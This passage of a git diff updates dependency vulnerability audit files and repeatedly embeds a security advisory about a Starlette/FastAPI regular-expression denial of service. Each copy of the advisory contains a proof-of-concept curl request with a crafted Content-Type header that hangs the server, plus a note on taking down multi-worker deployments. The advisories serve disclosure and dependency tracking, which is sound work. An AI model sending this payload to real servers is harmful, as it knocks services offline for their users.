uvicorn\n\n 501 59461 24785 0 4:28PM ttys004 0:00.13 /Users/user/code/starlette/env3.10/bin/python /Users/user/code/starlette/env3.10/bin/uvicorn redos_starlette:app\n 501 59466 99935 0 4:28PM ttys010 0:00.00 grep uvicorn\n```\n\nIn this case, the process ID was `59461`, then you can kill it (forcefully, with `-9`) with:\n\n```console\n$ kill -9 59461\n```\n\n### Impact\n\nIt's a ReDoS, (Regular expression Denial of Service), it only applies to those reading form data, using `python-multipart`. This way it also affects other libraries using Starlette, like FastAPI.\n\n### Original Report\n\nThis was originally reported to FastAPI as an email to security@tiangolo.com, sent via https://huntr.com/, the original reporter is Marcello, https://github.com/byt3bl33d3r\n\n
\nOriginal report to FastAPI\n\nHey Tiangolo!\n\nMy name's Marcello and I work on the ProtectAI/Huntr Threat Research team, a few months ago we got a report (from @nicecatch2000) of a ReDoS affecting another very popular Python web framework. After some internal research, I found that FastAPI is vulnerable to the same ReDoS under certain conditions (only when it parses Form data not JSON).\n\nHere are the details: I'm using the latest version of FastAPI (0.109.0) and the following code:\n\n```Python\nfrom typing import Annotated\nfrom fastapi.responses import HTMLResponse\nfrom fastapi import FastAPI,Form\nfrom pydantic import BaseModel\n\nclass Item(BaseModel):\n username: str\n\napp = FastAPI()\n\n@app.get(\"/\", response_class=HTMLResponse)\nasync def index():\n return HTMLResponse(\"Test\", status_code=200)\n\n@app.post(\"/submit/\")\nasync def submit(username: Annotated[str, Form()]):\n return {\"username\": username}\n\n@app.post(\"/submit_json/\")\nasync def submit_json(item: Item):\n return {\"username\": item.username}\n```\n\nI'm running the above with uvicorn with the following command:\n\n```console\nuvicorn server:app\n```\n\nThen run the following cUrl command:\n\n```\ncurl -v -X 'POST' -H $'Content-Type: application/x-www-form-urlencoded; !=\\\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\' --data-binary 'input=1' 'http://localhost:8000/submit/'\n```\n\nYou'll see the server locks up, is unable to serve anymore requests and one CPU core is pegged to 100%\n\nYou can even start uvicorn with multiple workers with the --workers 4 argument and as long as you send (workers + 1) requests you'll completely DoS the FastApi server.\n\nIf you try submitting Json to the /submit_json endpoint with the malicious Content-Type header you'll see it isn't vulnerable. So this only affects FastAPI when it parses Form data.\n\nCheers\n\n#### Impact\n\nAn attacker is able to cause a DoS on a FastApi server via a malicious Content-Type header if it parses Form data.\n\n#### Occurrences\n\n[params.py L586](https://github.com/tiangolo/fastapi/blob/d74b3b25659b42233a669f032529880de8bd6c2d/fastapi/params.py#L586)\n\n
", + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "starlette", + "purl": "pkg:pypi/starlette" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.36.2" + } + ] + } + ], + "versions": [ + "0.1.0", + "0.1.1", + "0.1.10", + "0.1.11", + "0.1.12", + "0.1.13", + "0.1.14", + "0.1.15", + "0.1.16", + "0.1.17", + "0.1.2", + "0.1.3", + "0.1.4", + "0.1.5", + "0.1.6", + "0.1.7", + "0.1.8", + "0.1.9", + "0.10.0", + "0.10.1", + "0.10.2", + "0.10.3", + "0.10.4", + "0.10.5", + "0.10.6", + "0.10.7", + "0.11.0", + "0.11.1", + "0.11.2", + "0.11.3", + "0.11.4", + "0.12.0", + "0.12.0b1", + "0.12.0b2", + "0.12.0b3", + "0.12.1", + "0.12.10", + "0.12.11", + "0.12.12", + "0.12.13", + "0.12.2", + "0.12.3", + "0.12.4", + "0.12.5", + "0.12.6", + "0.12.7", + "0.12.8", + "0.12.9", + "0.13.0", + "0.13.1", + "0.13.2", + "0.13.3", + "0.13.4", + "0.13.5", + "0.13.6", + "0.13.7", + "0.13.8", + "0.14.0", + "0.14.1", + "0.14.2", + "0.15.0", + "0.16.0", + "0.17.0", + "0.17.1", + "0.18.0", + "0.19.0", + "0.19.1", + "0.2.0", + "0.2.1", + "0.2.2", + "0.2.3", + "0.20.0", + "0.20.1", + "0.20.2", + "0.20.3", + "0.20.4", + "0.21.0", + "0.22.0", + "0.23.0", + "0.23.1", + "0.24.0", + "0.25.0", + "0.26.0", + "0.26.0.post1", + "0.26.1", + "0.27.0", + "0.28.0", + "0.29.0", + "0.3.0", + "0.3.1", + "0.3.2", + "0.3.3", + "0.3.4", + "0.3.5", + "0.3.6", + "0.3.7", + "0.30.0", + "0.31.0", + "0.31.1", + "0.32.0", + "0.32.0.post1", + "0.33.0", + "0.34.0", + "0.35.0", + "0.35.1", + "0.36.0", + "0.36.1", + "0.4.0", + "0.4.1", + "0.4.2", + "0.5.0", + "0.5.1", + "0.5.2", + "0.5.3", + "0.5.4", + "0.5.5", + "0.6.0", + "0.6.1", + "0.6.2", + "0.6.3", + "0.7.0", + "0.7.1", + "0.7.2", + "0.7.3", + "0.7.4", + "0.8.0", + "0.8.1", + "0.8.2", + "0.8.3", + "0.8.4", + "0.8.5", + "0.8.6", + "0.8.7", + "0.8.8", + "0.9.0", + "0.9.1", + "0.9.10", + "0.9.11", + "0.9.2", + "0.9.3", + "0.9.4", + "0.9.5", + "0.9.6", + "0.9.7", + "0.9.8", + "0.9.9" + ], + "database_specific": { + "last_known_affected_version_range": "<= 0.36.1", + "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/02/GHSA-93gm-qmq6-w238/GHSA-93gm-qmq6-w238.json" + } + } + ], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/encode/starlette/security/advisories/GHSA-93gm-qmq6-w238" + }, + { + "type": "WEB", + "url": "https://github.com/encode/starlette/commit/13e5c26a27f4903924624736abd6131b2da80cc5" + }, + { + "type": "WEB", + "url": "https://github.com/andrew-d/python-multipart/blob/d3d16dae4b061c34fe9d3c9081d9800c49fc1f7a/multipart/multipart.py#L72-L74" + }, + { + "type": "PACKAGE", + "url": "https://github.com/encode/starlette" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-400" + ], + "github_reviewed": true, + "github_reviewed_at": "2024-02-05T17:01:19Z", + "nvd_published_at": null, + "severity": "HIGH" + } + } + ], + "groups": [ + { + "ids": [ + "GHSA-93gm-qmq6-w238" + ], + "aliases": [ + "GHSA-93gm-qmq6-w238" + ] + } + ] } ] \ No newline at end of file diff --git a/audits/fdroidserver-requirements.audit.json b/audits/fdroidserver-requirements.audit.json index 2b7af35f..1c60f561 100644 --- a/audits/fdroidserver-requirements.audit.json +++ b/audits/fdroidserver-requirements.audit.json @@ -371,7 +371,7 @@ ], "vulnerabilities": [ { - "modified": "2024-01-29T09:46:53Z", + "modified": "2024-02-05T23:31:03Z", "published": "2023-12-18T19:22:09Z", "schema_version": "1.6.0", "id": "GHSA-45x7-px36-x8w8", @@ -439,7 +439,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "2.5.0" }, { "fixed": "3.4.0" @@ -448,108 +448,6 @@ } ], "versions": [ - "0.1-bulbasaur", - "0.1-charmander", - "0.9-doduo", - "0.9-eevee", - "0.9-fearow", - "0.9-gyarados", - "0.9-horsea", - "0.9-ivysaur", - "1.0", - "1.1", - "1.10.0", - "1.10.1", - "1.10.2", - "1.10.3", - "1.10.4", - "1.10.5", - "1.10.6", - "1.10.7", - "1.11.0", - "1.11.1", - "1.11.2", - "1.11.3", - "1.11.4", - "1.11.5", - "1.11.6", - "1.12.0", - "1.12.1", - "1.12.2", - "1.12.3", - "1.12.4", - "1.13.0", - "1.13.1", - "1.13.2", - "1.13.3", - "1.13.4", - "1.14.0", - "1.14.1", - "1.14.2", - "1.14.3", - "1.15.0", - "1.15.1", - "1.15.2", - "1.15.3", - "1.15.4", - "1.15.5", - "1.16.0", - "1.16.1", - "1.16.2", - "1.16.3", - "1.17.0", - "1.17.1", - "1.17.2", - "1.17.3", - "1.17.4", - "1.17.5", - "1.17.6", - "1.18.0", - "1.18.1", - "1.18.2", - "1.18.3", - "1.18.4", - "1.18.5", - "1.2", - "1.3", - "1.3.1", - "1.4", - "1.5.1", - "1.5.2", - "1.5.4", - "1.6", - "1.6.1", - "1.6.2", - "1.6.3", - "1.6.4", - "1.7", - "1.7.1", - "1.7.2", - "1.7.4", - "1.7.5", - "1.7.6", - "1.7.7.1", - "1.7.7.2", - "1.8.0", - "1.8.1", - "1.9.0", - "2.0.0", - "2.0.1", - "2.0.2", - "2.0.3", - "2.0.4", - "2.0.5", - "2.0.6", - "2.0.7", - "2.0.8", - "2.0.9", - "2.1.0", - "2.1.1", - "2.1.2", - "2.1.3", - "2.1.4", - "2.1.5", - "2.1.6", "2.10.0", "2.10.1", "2.10.2", @@ -560,19 +458,6 @@ "2.11.0", "2.11.1", "2.12.0", - "2.2.0", - "2.2.1", - "2.2.2", - "2.2.3", - "2.2.4", - "2.3.0", - "2.3.1", - "2.3.2", - "2.3.3", - "2.4.0", - "2.4.1", - "2.4.2", - "2.4.3", "2.5.0", "2.5.1", "2.6.0", @@ -641,6 +526,10 @@ "type": "WEB", "url": "https://github.com/paramiko/paramiko/issues/2337" }, + { + "type": "WEB", + "url": "https://github.com/paramiko/paramiko/issues/2337#issuecomment-1887642773" + }, { "type": "WEB", "url": "https://github.com/proftpd/proftpd/issues/456" diff --git a/audits/flintrock-requirements.audit.json b/audits/flintrock-requirements.audit.json index 69d06370..125f024a 100644 --- a/audits/flintrock-requirements.audit.json +++ b/audits/flintrock-requirements.audit.json @@ -10,7 +10,7 @@ ], "vulnerabilities": [ { - "modified": "2024-01-29T09:46:53Z", + "modified": "2024-02-05T23:31:03Z", "published": "2023-12-18T19:22:09Z", "schema_version": "1.6.0", "id": "GHSA-45x7-px36-x8w8", @@ -78,7 +78,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "2.5.0" }, { "fixed": "3.4.0" @@ -87,108 +87,6 @@ } ], "versions": [ - "0.1-bulbasaur", - "0.1-charmander", - "0.9-doduo", - "0.9-eevee", - "0.9-fearow", - "0.9-gyarados", - "0.9-horsea", - "0.9-ivysaur", - "1.0", - "1.1", - "1.10.0", - "1.10.1", - "1.10.2", - "1.10.3", - "1.10.4", - "1.10.5", - "1.10.6", - "1.10.7", - "1.11.0", - "1.11.1", - "1.11.2", - "1.11.3", - "1.11.4", - "1.11.5", - "1.11.6", - "1.12.0", - "1.12.1", - "1.12.2", - "1.12.3", - "1.12.4", - "1.13.0", - "1.13.1", - "1.13.2", - "1.13.3", - "1.13.4", - "1.14.0", - "1.14.1", - "1.14.2", - "1.14.3", - "1.15.0", - "1.15.1", - "1.15.2", - "1.15.3", - "1.15.4", - "1.15.5", - "1.16.0", - "1.16.1", - "1.16.2", - "1.16.3", - "1.17.0", - "1.17.1", - "1.17.2", - "1.17.3", - "1.17.4", - "1.17.5", - "1.17.6", - "1.18.0", - "1.18.1", - "1.18.2", - "1.18.3", - "1.18.4", - "1.18.5", - "1.2", - "1.3", - "1.3.1", - "1.4", - "1.5.1", - "1.5.2", - "1.5.4", - "1.6", - "1.6.1", - "1.6.2", - "1.6.3", - "1.6.4", - "1.7", - "1.7.1", - "1.7.2", - "1.7.4", - "1.7.5", - "1.7.6", - "1.7.7.1", - "1.7.7.2", - "1.8.0", - "1.8.1", - "1.9.0", - "2.0.0", - "2.0.1", - "2.0.2", - "2.0.3", - "2.0.4", - "2.0.5", - "2.0.6", - "2.0.7", - "2.0.8", - "2.0.9", - "2.1.0", - "2.1.1", - "2.1.2", - "2.1.3", - "2.1.4", - "2.1.5", - "2.1.6", "2.10.0", "2.10.1", "2.10.2", @@ -199,19 +97,6 @@ "2.11.0", "2.11.1", "2.12.0", - "2.2.0", - "2.2.1", - "2.2.2", - "2.2.3", - "2.2.4", - "2.3.0", - "2.3.1", - "2.3.2", - "2.3.3", - "2.4.0", - "2.4.1", - "2.4.2", - "2.4.3", "2.5.0", "2.5.1", "2.6.0", @@ -280,6 +165,10 @@ "type": "WEB", "url": "https://github.com/paramiko/paramiko/issues/2337" }, + { + "type": "WEB", + "url": "https://github.com/paramiko/paramiko/issues/2337#issuecomment-1887642773" + }, { "type": "WEB", "url": "https://github.com/proftpd/proftpd/issues/456" diff --git a/audits/platformio-requirements.audit.json b/audits/platformio-requirements.audit.json new file mode 100644 index 00000000..7bb4dafa --- /dev/null +++ b/audits/platformio-requirements.audit.json @@ -0,0 +1,239 @@ +[ + { + "package": { + "name": "starlette", + "version": "0.35.1", + "ecosystem": "PyPI" + }, + "dependency_groups": [ + "platformio-requirements" + ], + "vulnerabilities": [ + { + "modified": "2024-02-05T17:18:11Z", + "published": "2024-02-05T17:01:19Z", + "schema_version": "1.6.0", + "id": "GHSA-93gm-qmq6-w238", + "summary": "Starlette Content-Type Header ReDoS", + "details": "### Summary\n\nWhen using form data, `python-multipart` uses a Regular Expression to parse the HTTP `Content-Type` header, including options.\n\nAn attacker could send a custom-made `Content-Type` option that is very difficult for the RegEx to process, consuming CPU resources and stalling indefinitely (minutes or more) while holding the main event loop. This means that process can't handle any more requests.\n\nThis can create a ReDoS (Regular expression Denial of Service): https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS\n\nThis only applies when the app uses form data, parsed with `python-multipart`.\n\n### Details\n\nA regular HTTP `Content-Type` header could look like:\n\n```\nContent-Type: text/html; charset=utf-8\n```\n\n`python-multipart` parses the option with this RegEx: https://github.com/andrew-d/python-multipart/blob/d3d16dae4b061c34fe9d3c9081d9800c49fc1f7a/multipart/multipart.py#L72-L74\n\nA custom option could be made and sent to the server to break it with:\n\n```\nContent-Type: application/x-www-form-urlencoded; !=\\\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\n```\n\n### PoC\n\nCreate a Starlette app that uses form data. To reproduce it it's not even necessary to create a Starlette app, just using the `Request` is enough:\n\n```Python\n# main.py\nfrom starlette.requests import Request\nfrom starlette.responses import JSONResponse\n\n\nasync def app(scope, receive, send):\n assert scope[\"type\"] == \"http\"\n request = Request(scope, receive)\n data = await request.form()\n response_data = {}\n for key in data:\n print(key, data.getlist(key))\n response_data[key] = data.getlist(key)\n response = JSONResponse(response_data)\n await response(scope, receive, send)\n```\n\nThen start it with:\n\n```console\n$ uvicorn main:app\n\nINFO: Started server process [50601]\nINFO: Waiting for application startup.\nINFO: ASGI 'lifespan' protocol appears unsupported.\nINFO: Application startup complete.\nINFO: Uvicorn running on http://127.0.0.1:8000 (Press CTRL+C to quit)\n```\n\nThen send the attacking request with:\n\n```console\n$ curl -v -X 'POST' -H $'Content-Type: application/x-www-form-urlencoded; !=\\\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\' --data-binary 'input=1' 'http://localhost:8000/'\n```\n\n#### Stopping it\n\nBecause that holds the main loop consuming the CPU non-stop, it's not possible to simply kill Uvicorn with `Ctrl+C` as it can't handle the signal.\n\nTo stop it, first check the process ID running Uvicorn:\n\n```console\n$ ps -fA | grep uvicorn\n\n 501 59461 24785 0 4:28PM ttys004 0:00.13 /Users/user/code/starlette/env3.10/bin/python /Users/user/code/starlette/env3.10/bin/uvicorn redos_starlette:app\n 501 59466 99935 0 4:28PM ttys010 0:00.00 grep uvicorn\n```\n\nIn this case, the process ID was `59461`, then you can kill it (forcefully, with `-9`) with:\n\n```console\n$ kill -9 59461\n```\n\n### Impact\n\nIt's a ReDoS, (Regular expression Denial of Service), it only applies to those reading form data, using `python-multipart`. This way it also affects other libraries using Starlette, like FastAPI.\n\n### Original Report\n\nThis was originally reported to FastAPI as an email to security@tiangolo.com, sent via https://huntr.com/, the original reporter is Marcello, https://github.com/byt3bl33d3r\n\n
\nOriginal report to FastAPI\n\nHey Tiangolo!\n\nMy name's Marcello and I work on the ProtectAI/Huntr Threat Research team, a few months ago we got a report (from @nicecatch2000) of a ReDoS affecting another very popular Python web framework. After some internal research, I found that FastAPI is vulnerable to the same ReDoS under certain conditions (only when it parses Form data not JSON).\n\nHere are the details: I'm using the latest version of FastAPI (0.109.0) and the following code:\n\n```Python\nfrom typing import Annotated\nfrom fastapi.responses import HTMLResponse\nfrom fastapi import FastAPI,Form\nfrom pydantic import BaseModel\n\nclass Item(BaseModel):\n username: str\n\napp = FastAPI()\n\n@app.get(\"/\", response_class=HTMLResponse)\nasync def index():\n return HTMLResponse(\"Test\", status_code=200)\n\n@app.post(\"/submit/\")\nasync def submit(username: Annotated[str, Form()]):\n return {\"username\": username}\n\n@app.post(\"/submit_json/\")\nasync def submit_json(item: Item):\n return {\"username\": item.username}\n```\n\nI'm running the above with uvicorn with the following command:\n\n```console\nuvicorn server:app\n```\n\nThen run the following cUrl command:\n\n```\ncurl -v -X 'POST' -H $'Content-Type: application/x-www-form-urlencoded; !=\\\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\' --data-binary 'input=1' 'http://localhost:8000/submit/'\n```\n\nYou'll see the server locks up, is unable to serve anymore requests and one CPU core is pegged to 100%\n\nYou can even start uvicorn with multiple workers with the --workers 4 argument and as long as you send (workers + 1) requests you'll completely DoS the FastApi server.\n\nIf you try submitting Json to the /submit_json endpoint with the malicious Content-Type header you'll see it isn't vulnerable. So this only affects FastAPI when it parses Form data.\n\nCheers\n\n#### Impact\n\nAn attacker is able to cause a DoS on a FastApi server via a malicious Content-Type header if it parses Form data.\n\n#### Occurrences\n\n[params.py L586](https://github.com/tiangolo/fastapi/blob/d74b3b25659b42233a669f032529880de8bd6c2d/fastapi/params.py#L586)\n\n
", + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "starlette", + "purl": "pkg:pypi/starlette" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.36.2" + } + ] + } + ], + "versions": [ + "0.1.0", + "0.1.1", + "0.1.10", + "0.1.11", + "0.1.12", + "0.1.13", + "0.1.14", + "0.1.15", + "0.1.16", + "0.1.17", + "0.1.2", + "0.1.3", + "0.1.4", + "0.1.5", + "0.1.6", + "0.1.7", + "0.1.8", + "0.1.9", + "0.10.0", + "0.10.1", + "0.10.2", + "0.10.3", + "0.10.4", + "0.10.5", + "0.10.6", + "0.10.7", + "0.11.0", + "0.11.1", + "0.11.2", + "0.11.3", + "0.11.4", + "0.12.0", + "0.12.0b1", + "0.12.0b2", + "0.12.0b3", + "0.12.1", + "0.12.10", + "0.12.11", + "0.12.12", + "0.12.13", + "0.12.2", + "0.12.3", + "0.12.4", + "0.12.5", + "0.12.6", + "0.12.7", + "0.12.8", + "0.12.9", + "0.13.0", + "0.13.1", + "0.13.2", + "0.13.3", + "0.13.4", + "0.13.5", + "0.13.6", + "0.13.7", + "0.13.8", + "0.14.0", + "0.14.1", + "0.14.2", + "0.15.0", + "0.16.0", + "0.17.0", + "0.17.1", + "0.18.0", + "0.19.0", + "0.19.1", + "0.2.0", + "0.2.1", + "0.2.2", + "0.2.3", + "0.20.0", + "0.20.1", + "0.20.2", + "0.20.3", + "0.20.4", + "0.21.0", + "0.22.0", + "0.23.0", + "0.23.1", + "0.24.0", + "0.25.0", + "0.26.0", + "0.26.0.post1", + "0.26.1", + "0.27.0", + "0.28.0", + "0.29.0", + "0.3.0", + "0.3.1", + "0.3.2", + "0.3.3", + "0.3.4", + "0.3.5", + "0.3.6", + "0.3.7", + "0.30.0", + "0.31.0", + "0.31.1", + "0.32.0", + "0.32.0.post1", + "0.33.0", + "0.34.0", + "0.35.0", + "0.35.1", + "0.36.0", + "0.36.1", + "0.4.0", + "0.4.1", + "0.4.2", + "0.5.0", + "0.5.1", + "0.5.2", + "0.5.3", + "0.5.4", + "0.5.5", + "0.6.0", + "0.6.1", + "0.6.2", + "0.6.3", + "0.7.0", + "0.7.1", + "0.7.2", + "0.7.3", + "0.7.4", + "0.8.0", + "0.8.1", + "0.8.2", + "0.8.3", + "0.8.4", + "0.8.5", + "0.8.6", + "0.8.7", + "0.8.8", + "0.9.0", + "0.9.1", + "0.9.10", + "0.9.11", + "0.9.2", + "0.9.3", + "0.9.4", + "0.9.5", + "0.9.6", + "0.9.7", + "0.9.8", + "0.9.9" + ], + "database_specific": { + "last_known_affected_version_range": "<= 0.36.1", + "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/02/GHSA-93gm-qmq6-w238/GHSA-93gm-qmq6-w238.json" + } + } + ], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/encode/starlette/security/advisories/GHSA-93gm-qmq6-w238" + }, + { + "type": "WEB", + "url": "https://github.com/encode/starlette/commit/13e5c26a27f4903924624736abd6131b2da80cc5" + }, + { + "type": "WEB", + "url": "https://github.com/andrew-d/python-multipart/blob/d3d16dae4b061c34fe9d3c9081d9800c49fc1f7a/multipart/multipart.py#L72-L74" + }, + { + "type": "PACKAGE", + "url": "https://github.com/encode/starlette" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-400" + ], + "github_reviewed": true, + "github_reviewed_at": "2024-02-05T17:01:19Z", + "nvd_published_at": null, + "severity": "HIGH" + } + } + ], + "groups": [ + { + "ids": [ + "GHSA-93gm-qmq6-w238" + ], + "aliases": [ + "GHSA-93gm-qmq6-w238" + ] + } + ] + } +] \ No newline at end of file diff --git a/audits/schemathesis-requirements.audit.json b/audits/schemathesis-requirements.audit.json new file mode 100644 index 00000000..d78329ad --- /dev/null +++ b/audits/schemathesis-requirements.audit.json @@ -0,0 +1,239 @@ +[ + { + "package": { + "name": "starlette", + "version": "0.36.1", + "ecosystem": "PyPI" + }, + "dependency_groups": [ + "schemathesis-requirements" + ], + "vulnerabilities": [ + { + "modified": "2024-02-05T17:18:11Z", + "published": "2024-02-05T17:01:19Z", + "schema_version": "1.6.0", + "id": "GHSA-93gm-qmq6-w238", + "summary": "Starlette Content-Type Header ReDoS", + "details": "### Summary\n\nWhen using form data, `python-multipart` uses a Regular Expression to parse the HTTP `Content-Type` header, including options.\n\nAn attacker could send a custom-made `Content-Type` option that is very difficult for the RegEx to process, consuming CPU resources and stalling indefinitely (minutes or more) while holding the main event loop. This means that process can't handle any more requests.\n\nThis can create a ReDoS (Regular expression Denial of Service): https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS\n\nThis only applies when the app uses form data, parsed with `python-multipart`.\n\n### Details\n\nA regular HTTP `Content-Type` header could look like:\n\n```\nContent-Type: text/html; charset=utf-8\n```\n\n`python-multipart` parses the option with this RegEx: https://github.com/andrew-d/python-multipart/blob/d3d16dae4b061c34fe9d3c9081d9800c49fc1f7a/multipart/multipart.py#L72-L74\n\nA custom option could be made and sent to the server to break it with:\n\n```\nContent-Type: application/x-www-form-urlencoded; !=\\\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\n```\n\n### PoC\n\nCreate a Starlette app that uses form data. To reproduce it it's not even necessary to create a Starlette app, just using the `Request` is enough:\n\n```Python\n# main.py\nfrom starlette.requests import Request\nfrom starlette.responses import JSONResponse\n\n\nasync def app(scope, receive, send):\n assert scope[\"type\"] == \"http\"\n request = Request(scope, receive)\n data = await request.form()\n response_data = {}\n for key in data:\n print(key, data.getlist(key))\n response_data[key] = data.getlist(key)\n response = JSONResponse(response_data)\n await response(scope, receive, send)\n```\n\nThen start it with:\n\n```console\n$ uvicorn main:app\n\nINFO: Started server process [50601]\nINFO: Waiting for application startup.\nINFO: ASGI 'lifespan' protocol appears unsupported.\nINFO: Application startup complete.\nINFO: Uvicorn running on http://127.0.0.1:8000 (Press CTRL+C to quit)\n```\n\nThen send the attacking request with:\n\n```console\n$ curl -v -X 'POST' -H $'Content-Type: application/x-www-form-urlencoded; !=\\\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\' --data-binary 'input=1' 'http://localhost:8000/'\n```\n\n#### Stopping it\n\nBecause that holds the main loop consuming the CPU non-stop, it's not possible to simply kill Uvicorn with `Ctrl+C` as it can't handle the signal.\n\nTo stop it, first check the process ID running Uvicorn:\n\n```console\n$ ps -fA | grep uvicorn\n\n 501 59461 24785 0 4:28PM ttys004 0:00.13 /Users/user/code/starlette/env3.10/bin/python /Users/user/code/starlette/env3.10/bin/uvicorn redos_starlette:app\n 501 59466 99935 0 4:28PM ttys010 0:00.00 grep uvicorn\n```\n\nIn this case, the process ID was `59461`, then you can kill it (forcefully, with `-9`) with:\n\n```console\n$ kill -9 59461\n```\n\n### Impact\n\nIt's a ReDoS, (Regular expression Denial of Service), it only applies to those reading form data, using `python-multipart`. This way it also 